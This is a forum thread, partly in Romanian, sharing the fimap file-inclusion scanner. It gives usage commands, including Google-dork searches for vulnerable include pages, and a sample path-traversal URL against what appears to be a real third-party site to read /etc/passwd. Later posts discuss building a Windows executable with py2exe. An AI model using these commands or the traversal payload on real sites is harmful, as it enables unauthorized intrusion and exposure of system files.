Fimap RFI/LFI scanner

[x3uz]

for my first post, I shared a very useful tool for RFI / LFI

Examples:

1. Scan a single URL for FI errors:

 ./fimap.py -u 'http://localhost/test.php?file=bang&id=23'

2. Scan a list of URLS for FI errors:

 ./fimap.py -m -l '/tmp/urllist.txt'

3. Scan Google search results for FI errors:

./fimap.py -g -q 'inurl:include.php'

4. Harvest all links of a webpage with recurse level of 3 and

write the URLs to /tmp/urllist

./fimap.py -H -u 'http://localhost' -d 3 -w /tmp/urllist

fimap - A little tool for local and remote file inclusion auditing and exploitation. - Google Project Hosting

[Birkoff]

tre sa ai piton instalat ca sa mearga ala... poate cineva care se pricepe face un executabil care sa mearga independent...

[x3uz]

can be! Personally, I'm under linux and python is installed base but this a very good tool !

[x3uz]

small exemple of result LFI scan :

 http://vladru.tk/1/include.php?url=..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

[Birkoff]

can be! Personally, I'm under linux and python is installed base but this a very good tool !

I realized this, but since i do not work in python, but in other languages, ??would be useful to ad a binary version for Windows. That's why i specified. So good anyway, i'm curious to what the final version will be implemented. If you have a compiler and i do know how to compile program, that many from here can hardly wait.

[blech]

@x3uz do not doublepost

@Birkoff l-am facut eu pt windows dar la teste cand dau un simplu scan de genu fimap.exe -g -q 'argumen'

imi da eroarea: "generic.xml file not found! This file is very important!" si nu stiu cum sa-l import sau unde sa-l pun.

precizez ca sunt noob si ca am creat versiunea pentru windows cu py2exe

mai exact:

python install.py py2exe

unde install.py contine

from distutils.core import setup

import py2exe

setup(console=['fimap.py'])

iar fisirele fimap au fost puse in root unde au fost executate si comenzile